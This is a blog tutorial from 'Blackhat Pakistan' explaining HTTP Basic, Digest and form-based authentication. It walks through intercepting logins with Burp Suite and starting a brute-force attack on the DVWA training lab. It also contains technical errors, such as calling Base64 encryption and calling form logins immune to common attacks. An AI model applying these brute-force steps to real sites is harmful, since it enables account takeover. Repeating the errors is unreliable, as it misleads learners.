Hacking web authentication – part 1 by Blackhat Pakistan
Today we will learn about Hacking web authentication.
Introduction [Hacking web authentication]
Authentication is the process of verifying something as authentic. When a client requests a web server to access a resource, sometimes the web server must verify the user’s identity. For this, the user will have to enter some credentials and the web server will verify them. All subsequent decisions are then made based on credentials supplied by the client. This process is called authentication. Once the user is authenticated, the web server sets the appropriate permissions for the user on its resources. Whenever a user tries to access a resource, the server checks whether the user has the appropriate permissions to access the resource or not. This process is called authorization. In this article, we’ll look at some common authentication types in use today, discuss their vulnerabilities, and then move on to some attacks against these authentication types.
Please note that in this article we will be using Burpsuite to analyze submitted requests. Burpsuite is available in Backtrack by default. In order to intercept and handle requests, we need to configure our browser to use Burp’s proxy, which is 127.0.0.1:8080 by default. We’ll also be using Wireshark a bit.
Once this is done, open up Burpsuite, go to Proxy–>Intercept and make sure Intercept is on.
Now go to the Options tab and check that the proxy is listening on port 8080. Also, make sure that the “Generate CA-signed per-host certificates” option is checked. Every time a user connects to an SSL-protected website, Burpsuite generates a server certificate for that host, signed by the unique CA certificate that is generated in Burpsuite during its installation. The purpose is to reduce SSL errors that occur due to proxies between them.
Now that we have properly set up Burpsuite and the configuration in our browser, we can capture requests. Please note that whenever you submit a request, Burpsuite will be intercepted and you will have to forward it manually. Therefore, it is advisable to leave the “intercept is on” option checked only if you really want to see the contents of passing packets.
Also read:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
Types of authentication
1.Basic HTTP authentication
HTTP-Basic authentication uses a combination of username and password to authenticate the user. The process is triggered when a user sends a GET request to a resource without providing any authentication credentials. The request is captured by Burpsuite and looks something like this.
The server responds with an “Authorization Required” message in the header. We can see the packet in Wireshark. As we can see from the header, the authentication is of the “Basic” type. The browser will quickly recognize this and show the user a popup asking for a username and password. Please note that the popup is displayed by the browser, not the web application.
Once we enter the username and password and recapture the request with Burpsuite, we get something like the image below. The last line says “Authorization: Basic aW5mb3NlYzppbmZvc2VjaW5zdGl0dXRl”. That’s basically the extra thing that’s being passed in the header now. The text behind Basic has a key. These are essentially login data in encrypted form. The username and password are concatenated with a colon (:) between them, and the whole thing is then Base64 encoded. For example, if the username is “infosec” and the password is “infosecinstitute”, then the whole “infosec:infosecinstitute” thing is Base 64 encoded. The server then gets the header value, decodes it to get credentials and grant access to the user if they are logged in data correct. It should be noted here that it is very trivial to decode the encrypted string to get the credentials and thus it is widely vulnerable to eavesdropping attacks.
Wireshark is able to recognize this and automatically decodes the string to reveal the credentials as shown in the figure below.
As we can see in the Credentials sections, the username and password are “infosec” and “infosecinstitute”. One problem with HTTP-Basic Authentication is that data is passed as plain text. This risk can be eliminated by using SSL, which will send the data in an encrypted format and therefore the value in the Authorization header will not be visible. However, it will still be vulnerable to many client-side attacks, including MITM. It is also vulnerable to brute force attacks, which we will see in the following sections.
2.HTTP-digest authentication
Digest Authentication was designed as an improvement over basic HTTP authentication. One of the main improvements is that data is not transmitted in clear text, but in an encrypted format. The user first makes a request to the page without any credentials. The server responds with a WWW-Authenticate header indicating that credentials are required to access the resource. The server will also send back a random value, usually called a “nonce”. The browser then uses a cryptographic function to create a message digest of the username, password, nonce, HTTP methods, and page URL. The cryptographic function used in this case is a one-way function, meaning that a message digest can be produced in one direction, but cannot be reversed to reveal the values that produced it. By default, Digest authentication uses the MD5 cryptographic hashing algorithm.
Digest Access authentication is less vulnerable to eavesdropping attacks than basic authentication, but is still vulnerable to replay attacks, i.e. if the client can replay the digest of the message created by encryption, the server will grant access to the client. However, to prevent this kind of attack, the nonce server sometimes includes timestamps as well. Once the server gets back the nonce, it checks its attributes and can reject the request from the client if the duration is exceeded. One of the other good things about Digest access authentication is that an attacker will need to know all the other 4 values (username, nonce, url, http method) to perform a dictionary or brute force attack. This process is computationally more expensive than simple brute-force attacks and also has a larger key space, making a brute-force attack less likely to succeed.
3.Form-based authentication
Form Based Authentication uses a form (usually in html) with input tags that allow users to enter their username and password. Once the user submits the information, it is passed to the server by either the GET or POST methods over HTTP or HTTPs. If the credentials are found to be correct on the server side, the user is authenticated and the user is assigned a random token value or session ID for subsequent requests. One of the good things about forms-based authentication is that there is no standardized way of encoding or encrypting a username/password and is therefore highly customizable, making it immune to common attacks that have been successful against the HTML Basic and Digest Authentication mechanisms . . Form Based Authentication is by far the most popular authentication method used in web applications. Some problems with forms-based authentication are that credentials are passed in plain text unless steps are taken, such as using TLS (Transport Layer Security).
Let’s look at an example of form-based authentication. For our exercise we will be using DVWA (Damnly Vulnerable Web Application) as well as we will use the same to perform brute force attack against form based authentication. DVWA can be downloaded here.
Once downloaded and installed, login with the default credentials {admin/password} and click the Brute Force tab on the left and click View Source to view the source. Please note that the security level is set to high in my case. As we can see, the form accepts a username and password, validates them to remove any kind of special characters that could be used to perform SQL injection, and then sends it to an SQL query where the credentials are checked against the database to see if are they correct or not.
let’s input any username/password and intercept the result using Burpsuite. Here is what it should look like in your case.
Attacking web authentication
In this section, we will perform a brute force attack against form-based authentication for the “High” security level in DVWA. Note that brute force attacks may not work in all cases. In some cases, websites will start rejecting your requests after a certain set number of failed attempts. Some websites may also use CAPTCHA to verify whether the request is actually made by a human or not.
We will use the intruder function in Burpsuite to perform a brute force attack. Some of the things required for this attack are a list of common usernames and passwords. Go to the form and submit the request using any username/password, then capture the request. Once you have a request, right click on it and click “send to intruders”
Conclusion
In this article, we discussed some of the common authentication methods in use, the vulnerabilities in those authentication methods, and then looked at different ways to attack them. However, that is only part of the story. Many other authentication mechanisms have been developed in recent years, including the use of “one-time passwords”, “digital certificates” and the use of external authentication service providers such as Open ID. A few other attacks not covered in this article are Session Stealing, Cookie stealing, Cross Site Request Forgery, and SQL Injection. We will discuss all this in the next article.
